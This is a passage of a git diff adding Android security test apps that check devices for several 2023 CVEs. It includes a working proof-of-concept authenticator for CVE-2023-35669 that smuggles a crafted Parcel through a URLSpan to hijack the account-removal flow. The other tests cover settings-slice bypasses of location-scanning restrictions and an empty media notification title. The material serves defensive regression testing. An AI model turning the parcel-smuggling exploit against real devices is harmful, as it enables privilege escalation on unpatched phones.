+ intent.getIntExtra(
+ context.getString(R.string.taskId),
+ -1);
+ if (sTaskId != -1) {
+ targetReturn.release();
+ }
+ }
+
+ // Wait for HijackActivity to get launched
+ if (intent.getBooleanExtra(
+ context.getString(R.string.isVulnerable),
+ false)) {
+ hijackReturn.release();
+ }
+
+ // Wait for PocActivity to get launched
+ mPocActivityStatus =
+ intent.getStringExtra(
+ context.getString(
+ R.string.pocActivityStatus));
+ if (mPocActivityStatus != null) {
+ pocReturn.release();
+ }
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ }
+ };
+ IntentFilter filter =
+ new IntentFilter(context.getString(R.string.bcastActionTarget));
+ context.registerReceiver(broadcastReceiver, filter);
+
+ // Start TargetActivity
+ context.startActivity(
+ new Intent(Intent.ACTION_MAIN)
+ .setClassName(
+ context.getString(R.string.pkgTarget),
+ context.getString(R.string.activityTarget))
+ .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+ assumeTrue(
+ context.getString(R.string.targetFailMsg),
+ targetReturn.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+
+ // Start PocActivity
+ context.startActivity(
+ new Intent(context, PocActivity.class)
+ .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+ assumeTrue(
+ context.getString(R.string.pocFailedMsg),
+ pocReturn.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+ assumeTrue(
+ context.getString(R.string.pocCrashedMsg, mPocActivityStatus),
+ mPocActivityStatus.equals(
+ context.getString(R.string.noExceptionMsg)));
+
+ // Wait for account name to appear on display and then click
+ UiDevice uiDevice = UiDevice.getInstance(instrumentation);
+ clickObject(context, uiDevice, context.getString(R.string.accountName));
+
+ // Click on 'Remove Account' button
+ clickObject(context, uiDevice, context.getString(R.string.removeAccount));
+
+ // Click on 'Remove Account' popup to confirm account removal
+ clickObject(context, uiDevice, context.getString(R.string.removeAccount));
+
+ // On vulnerable device, HijackActivity will be launched and the test fails
+ assertFalse(
+ context.getString(R.string.msgFailure),
+ hijackReturn.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+ });
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ public void clickObject(Context context, UiDevice uiDevice, String objectName) {
+ Pattern activityPattern = Pattern.compile(objectName, Pattern.CASE_INSENSITIVE);
+ BySelector removeAccountSelector = By.text(activityPattern);
+ UiObject2 uiObject = uiDevice.wait(Until.findObject(removeAccountSelector), TIMEOUT_MS);
+ assumeNotNull(context.getString(R.string.objectNotFound, objectName), uiObject);
+ uiObject.click();
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/HijackActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/HijackActivity.java
new file mode 100644
index 0000000..cbc869f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/HijackActivity.java
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_test;
+
+import android.app.Activity;
+import android.content.Intent;
+
+public class HijackActivity extends Activity {
+
+ @Override
+ public void onResume() {
+ try {
+ super.onResume();
+ sendBroadcast(
+ new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(getString(R.string.isVulnerable), true));
+ } catch (Exception ignored) {
+ // Ignoring exceptions here
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocActivity.java
new file mode 100644
index 0000000..48cec73
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocActivity.java
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_test;
+
+import android.accounts.Account;
+import android.accounts.AccountManager;
+import android.app.Activity;
+import android.content.Intent;
+import android.os.Bundle;
+import android.provider.Settings;
+
+public class PocActivity extends Activity {
+
+ @Override
+ public void onResume() {
+ try {
+ super.onResume();
+
+ // Adding account
+ getSystemService(AccountManager.class)
+ .addAccountExplicitly(
+ new Account(
+ getString(R.string.accountName),
+ getString(R.string.accountType)),
+ getString(R.string.password),
+ new Bundle());
+
+ // Show settings to allow configuration of sync settings
+ startActivity(new Intent(Settings.ACTION_SYNC_SETTINGS));
+ sendBroadcast(
+ new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(
+ getString(R.string.pocActivityStatus),
+ getString(R.string.noExceptionMsg)));
+ } catch (Exception e) {
+ try {
+ sendBroadcast(
+ new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(getString(R.string.pocActivityStatus), e.getMessage()));
+ } catch (Exception ignored) {
+ // Ignore any exceptions
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocAuthService.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocAuthService.java
new file mode 100644
index 0000000..4cdf4e5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/PocAuthService.java
@@ -0,0 +1,177 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_test;
+
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.accounts.AccountManager;
+import android.accounts.NetworkErrorException;
+import android.app.Service;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.LabeledIntent;
+import android.os.Bundle;
+import android.os.IBinder;
+import android.os.Parcel;
+import android.text.SpannableString;
+import android.text.style.URLSpan;
+
+import java.lang.reflect.Field;
+import java.nio.charset.StandardCharsets;
+
+public class PocAuthService extends Service {
+
+ private Bundle createResultBundle() {
+ try {
+ Bundle result = new Bundle();
+ result.putString(AccountManager.KEY_ACCOUNT_NAME, "testevilaccountname");
+ result.putString(AccountManager.KEY_ACCOUNT_TYPE, "testevilaccount");
+ result.putString(AccountManager.KEY_AUTHTOKEN, "mockAuthToken");
+ return result;
+ } catch (Exception ignored) {
+ // Ignore any exceptions
+ }
+ return null;
+ }
+
+ public PocAuthService() {}
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return new TestAccountAuthenticator(this).getIBinder();
+ }
+
+ class TestAccountAuthenticator extends AbstractAccountAuthenticator {
+
+ public TestAccountAuthenticator(Context context) {
+ super(context);
+ }
+
+ @Override
+ public Bundle getAccountRemovalAllowed(
+ AccountAuthenticatorResponse response, Account account)
+ throws NetworkErrorException {
+
+ try {
+ LabeledIntent labeledIntent =
+ new LabeledIntent(
+ new Intent(PocAuthService.this, HijackActivity.class),
+ null /* sourcePackage */,
+ 1 /* labelRes */,
+ 0 /* icon */);
+
+ // Creating parcel to setDataPosition
+ Parcel optionPayload = Parcel.obtain();
+ Bundle evilOptions = new Bundle();
+ evilOptions.putInt(getString(R.string.launchTaskId), DeviceTest.sTaskId);
+ evilOptions.writeToParcel(optionPayload, 0 /* flags */);
+ optionPayload.setDataPosition(0 /* position */);
+ int originLen = optionPayload.readInt();
+ optionPayload.setDataPosition(0 /* position */);
+
+ // Parcel data not fully consumed, unread size : 76
+ optionPayload.writeInt(originLen + 76);
+
+ // Creating parcel to create URLSpan
+ Parcel payload = Parcel.obtain();
+ payload.writeString(null /* resultWho */);
+ payload.writeInt(-1 /* requestCode */);
+ payload.writeInt(0 /* flags */);
+ payload.writeTypedObject(null, 0 /* profilerInfo */);
+ payload.writeInt(1 /* value */);
+ payload.appendFrom(optionPayload, 0 /* offset */, optionPayload.dataSize());
+
+ SpannableString spannableString =
+ new SpannableString(getString(R.string.spannableString));
+ spannableString.setSpan(
+ new URLSpan(new String(payload.marshall(), StandardCharsets.UTF_16LE)),
+ 0 /* start */,
+ 0 /* end */,
+ 0 /* flags */);
+
+ // Setting labeledIntent using refelection
+ Field nonLocalizedLabelField =
+ LabeledIntent.class.getDeclaredField(getString(R.string.fieldName));
+ nonLocalizedLabelField.setAccessible(true);
+ nonLocalizedLabelField.set(labeledIntent, spannableString);
+
+ Bundle result = new Bundle();
+ result.putParcelable(AccountManager.KEY_INTENT, labeledIntent);
+ return result;
+ } catch (Exception ignored) {
+ // Ignore any exceptions
+ }
+ return null;
+ }
+
+ @Override
+ public Bundle editProperties(AccountAuthenticatorResponse response, String accountType) {
+ return createResultBundle();
+ }
+
+ @Override
+ public Bundle addAccount(
+ AccountAuthenticatorResponse response,
+ String accountType,
+ String authTokenType,
+ String[] requiredFeatures,
+ Bundle options)
+ throws NetworkErrorException {
+ return createResultBundle();
+ }
+
+ @Override
+ public Bundle confirmCredentials(
+ AccountAuthenticatorResponse response, Account account, Bundle options)
+ throws NetworkErrorException {
+ return createResultBundle();
+ }
+
+ @Override
+ public Bundle getAuthToken(
+ AccountAuthenticatorResponse response,
+ Account account,
+ String authTokenType,
+ Bundle options)
+ throws NetworkErrorException {
+ return createResultBundle();
+ }
+
+ @Override
+ public String getAuthTokenLabel(String authTokenType) {
+ return "mockAuthTokenLabel";
+ }
+
+ @Override
+ public Bundle updateCredentials(
+ AccountAuthenticatorResponse response,
+ Account account,
+ String authTokenType,
+ Bundle options)
+ throws NetworkErrorException {
+ return createResultBundle();
+ }
+
+ @Override
+ public Bundle hasFeatures(
+ AccountAuthenticatorResponse response, Account account, String[] features)
+ throws NetworkErrorException {
+ return createResultBundle();
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/Android.bp
new file mode 100644
index 0000000..cd67da5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-40120",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ "sts-device-util",
+ "truth",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/AndroidManifest.xml
new file mode 100644
index 0000000..020a20f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_40120">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_40120" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/src/android/security/cts/CVE_2023_40120/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/src/android/security/cts/CVE_2023_40120/DeviceTest.java
new file mode 100644
index 0000000..c0c1ce5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-40120/src/android/security/cts/CVE_2023_40120/DeviceTest.java
@@ -0,0 +1,148 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_40120;
+
+import static android.provider.Settings.Global.SHOW_MEDIA_ON_QUICK_SETTINGS;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static com.google.common.truth.Truth.assertWithMessage;
+import static com.google.common.truth.TruthJUnit.assume;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.content.Context;
+import android.graphics.drawable.Icon;
+import android.media.MediaMetadata;
+import android.media.session.MediaSession;
+import android.service.notification.StatusBarNotification;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testPocCVE_2023_40120() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+
+ // Create a MediaSession
+ MediaSession session =
+ new MediaSession(context, "cve_2023_40120_session" /* session name */);
+
+ // Create a MediaMetadata object, pass an empty 'METADATA_KEY_TITLE' and set metadata
+ // for session
+ String artistName = "testArtist";
+ session.setMetadata(
+ new MediaMetadata.Builder()
+ .putString(MediaMetadata.METADATA_KEY_TITLE, "")
+ .putString(MediaMetadata.METADATA_KEY_ARTIST, artistName)
+ .build());
+
+ // Create notificationManager
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+
+ // Create notificationChannel
+ String channelId = "cve_2023_40120_channel_id";
+ notificationManager.createNotificationChannel(
+ new NotificationChannel(
+ channelId,
+ "cve_2023_40120_channel_name" /* notification channel name */,
+ NotificationManager.IMPORTANCE_DEFAULT));
+
+ // Post the Notification and check if any security exception is caught
+ notificationManager.notify(
+ 0 /* notification id */,
+ new Notification.Builder(context)
+ .setChannelId(channelId)
+ .setStyle(
+ new Notification.DecoratedMediaCustomViewStyle()
+ .setMediaSession(session.getSessionToken()))
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */, 0 /* offset */, 0 /* length */))
+ .build());
+
+ // Check if notification gets posted or not
+ assume().withMessage("Notification was not posted")
+ .that(
+ poll(
+ () -> {
+ StatusBarNotification[] activeNotifications =
+ notificationManager.getActiveNotifications();
+ for (StatusBarNotification notification :
+ activeNotifications) {
+ if (notification
+ .getPackageName()
+ .equals(context.getPackageName())) {
+ return true;
+ }
+ }
+ return false;
+ }))
+ .isTrue();
+
+ // Launch notification shade
+ UiDevice uiDevice = UiDevice.getInstance(instrumentation);
+ assume().withMessage("Unable to launch notification shade")
+ .that(uiDevice.openNotification())
+ .isTrue();
+
+ // Wait for 'qs_media_controls' resource id to appear
+ String systemuiPackage = "com.android.systemui";
+ UiObject2 resIdObj =
+ uiDevice.wait(
+ Until.findObject(By.res(systemuiPackage, SHOW_MEDIA_ON_QUICK_SETTINGS)),
+ 3000);
+
+ // Assumption failure if 'resIdObj' is null
+ assume().withMessage("resource id qs_media_controls not found")
+ .that(resIdObj)
+ .isNotNull();
+
+ // Assumption failure if 'testArtist' text is not present in notification
+ assume().withMessage("testArtist text not found")
+ .that(resIdObj.getContentDescription().contains(artistName))
+ .isTrue();
+
+ // Fail the test if either notification title is not present or notification title text
+ // is null
+ UiObject2 headerTitleObj =
+ resIdObj.getParent().findObject(By.res(systemuiPackage, "header_title"));
+ assertWithMessage("Device is vulnerable to b/274775190 hence foreground services can be"
+ + " started with an empty notification")
+ .that(headerTitleObj == null || headerTitleObj.getText() == null)
+ .isFalse();
+ } catch (Exception e) {
+ assume().that(e).isNull();
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/Android.bp b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/Android.bp
new file mode 100644
index 0000000..5df144f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "TestLocationScanningServicesUsingSlices",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.slice_slice-view",
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/AndroidManifest.xml
new file mode 100644
index 0000000..689397d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/AndroidManifest.xml
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.TestLocationScanningServicesUsingSlices">
+ <application android:testOnly="true">
+ <activity android:name=".PocActivity" />
+ <receiver android:name=".PocDeviceAdminReceiver"
+ android:permission="android.permission.BIND_DEVICE_ADMIN"
+ android:exported="true">
+ <meta-data android:name="android.app.device_admin"
+ android:resource="@xml/device_policies" />
+ <intent-filter>
+ <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
+ </intent-filter>
+ </receiver>
+ </application>
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.TestLocationScanningServicesUsingSlices" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/res/xml/device_policies.xml b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/res/xml/device_policies.xml
new file mode 100644
index 0000000..ed5352d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/res/xml/device_policies.xml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<device-admin>
+ <uses-policies />
+</device-admin>
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/DeviceTest.java
new file mode 100644
index 0000000..f936221
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/DeviceTest.java
@@ -0,0 +1,227 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.TestLocationScanningServicesUsingSlices;
+
+import static android.os.UserManager.DISALLOW_CONFIG_LOCATION;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.PendingIntent;
+import android.app.admin.DevicePolicyManager;
+import android.app.slice.SliceProvider;
+import android.content.ComponentName;
+import android.content.ContentResolver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.res.Resources;
+import android.net.Uri;
+import android.os.UserManager;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ private final int waitMS = 5_000;
+ private final String mSettingsPackage = "com.android.settings";
+ private final String mScanningTextResId = mSettingsPackage + ":id/switch_text";
+ private final String mScanningWidgetResId = "android:id/switch_widget";
+ private final String mBaseUri = "content://" + mSettingsPackage + ".slices/action/";
+
+ private Context mContext;
+ private ContentResolver mContentResolver;
+ private UiDevice mDevice;
+ private Resources mSettingsResources;
+
+ @Before
+ public void setUp() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ mContext = instrumentation.getTargetContext();
+ mContentResolver = mContext.getContentResolver();
+ mDevice = UiDevice.getInstance(instrumentation);
+ mSettingsResources =
+ mContext.getPackageManager().getResourcesForApplication(mSettingsPackage);
+
+ // Set DISALLOW_CONFIG_LOCATION restriction for the current user
+ mContext.getSystemService(DevicePolicyManager.class)
+ .addUserRestriction(
+ new ComponentName(mContext, PocDeviceAdminReceiver.class),
+ DISALLOW_CONFIG_LOCATION);
+ assumeTrue(
+ "Failed to set user restriction DISALLOW_CONFIG_LOCATION",
+ mContext.getSystemService(UserManager.class)
+ .getUserRestrictions()
+ .getBoolean(DISALLOW_CONFIG_LOCATION));
+ Object intent =
+ SliceProvider.createPermissionIntent(
+ mContext,
+ Uri.parse(mBaseUri),
+ "android.security.cts.TestLocationScanningServicesUsingSlices");
+
+ // For Android SC and SC-V2 createPermissionIntent returns an instance of
+ // PendingIntent
+ if (intent instanceof PendingIntent) {
+ ((PendingIntent) intent).send();
+ }
+
+ // For Android T and above createPermissionIntent returns an instance of
+ // Intent
+ if (intent instanceof Intent) {
+ mContext.startActivity(((Intent) intent).addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+ }
+
+ // Grant SLICE_PERMISSION by clicking on 'Allow'
+ Pattern allowPattern = Pattern.compile("Allow", Pattern.CASE_INSENSITIVE);
+ assumeTrue(mDevice.wait(Until.hasObject(By.text(allowPattern)), waitMS));
+ UiObject2 allowButton = mDevice.findObject(By.text(allowPattern));
+ allowButton.click();
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ @Test
+ public void testPocCVE_2023_21247() {
+ try {
+ final int initialBleScanGlobalSetting =
+ Settings.Global.getInt(
+ mContentResolver, Settings.Global.BLE_SCAN_ALWAYS_AVAILABLE, -1);
+ assumeTrue(initialBleScanGlobalSetting != -1);
+
+ // Launching PocActivity to launch "bluetooth_always_scanning_switch" settings
+ // slice using slice-uri
+ mContext.startActivity(
+ new Intent(mContext, PocActivity.class)
+ .setData(Uri.parse(mBaseUri + "bluetooth_always_scanning_switch"))
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // Wait for the slice that contains option to toggle "Bluetooth scanning"
+ String btScanningText =
+ mSettingsResources.getString(
+ mSettingsResources.getIdentifier(
+ "location_scanning_bluetooth_always_scanning_title",
+ "string",
+ mSettingsPackage));
+ boolean btScanningFound =
+ mDevice.wait(
+ Until.hasObject(By.text(btScanningText).res(mScanningTextResId)),
+ waitMS);
+ assumeTrue(
+ "Timed out waiting on the text \'" + btScanningText + "\' to appear",
+ btScanningFound);
+
+ // Try to toggle "Bluetooth scanning" button, it is supposed to be disabled by the
+ // Device Admin in presence of fix
+ UiObject2 btScanningToggle = mDevice.findObject(By.res(mScanningWidgetResId));
+ btScanningToggle.click();
+
+ // Value of isChecked is whether "Bluetooth scanning" button should be checked or
+ // unchecked after click()
+ assumeTrue(
+ "Timed out waiting on the button \'" + btScanningToggle + "\' to toggle",
+ btScanningToggle.wait(
+ Until.checked(initialBleScanGlobalSetting == 0 /* isChecked */),
+ waitMS)
+ || !btScanningToggle.isEnabled());
+
+ final int finalBleScanGlobalSetting =
+ Settings.Global.getInt(
+ mContentResolver, Settings.Global.BLE_SCAN_ALWAYS_AVAILABLE, -1);
+ assumeTrue(finalBleScanGlobalSetting != -1);
+
+ assertFalse(
+ "Device is vulnerable to b/277333781 !!",
+ finalBleScanGlobalSetting != initialBleScanGlobalSetting);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ @Test
+ public void testPocCVE_2023_21248() {
+ try {
+ final int initialWifiScanGlobalSetting =
+ Settings.Global.getInt(
+ mContentResolver, Settings.Global.WIFI_SCAN_ALWAYS_AVAILABLE, -1);
+ assumeTrue(initialWifiScanGlobalSetting != -1);
+
+ // Launching PocActivity to launch "wifi_always_scanning_switch" settings
+ // slice using slice-uri
+ mContext.startActivity(
+ new Intent(mContext, PocActivity.class)
+ .setData(Uri.parse(mBaseUri + "wifi_always_scanning_switch"))
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // Wait for the slice that contains option to toggle "Wifi scanning"
+ String wifiScanningText =
+ mSettingsResources.getString(
+ mSettingsResources.getIdentifier(
+ "location_scanning_wifi_always_scanning_title",
+ "string",
+ mSettingsPackage));
+ boolean wifiScanningFound =
+ mDevice.wait(
+ Until.hasObject(By.text(wifiScanningText).res(mScanningTextResId)),
+ waitMS);
+ assumeTrue(
+ "Timed out waiting on the text \'" + wifiScanningText + "\' to appear",
+ wifiScanningFound);
+
+ // Try to toggle "Wifi scanning" button, it is supposed to be disabled by the
+ // Device Admin in presence of fix
+ UiObject2 wifiScanningToggle = mDevice.findObject(By.res(mScanningWidgetResId));
+ wifiScanningToggle.click();
+
+ // Value of isChecked is whether "Wifi scanning" button should be checked or
+ // unchecked after click()
+ assumeTrue(
+ "Timed out waiting on the button \'" + wifiScanningToggle + "\' to toggle",
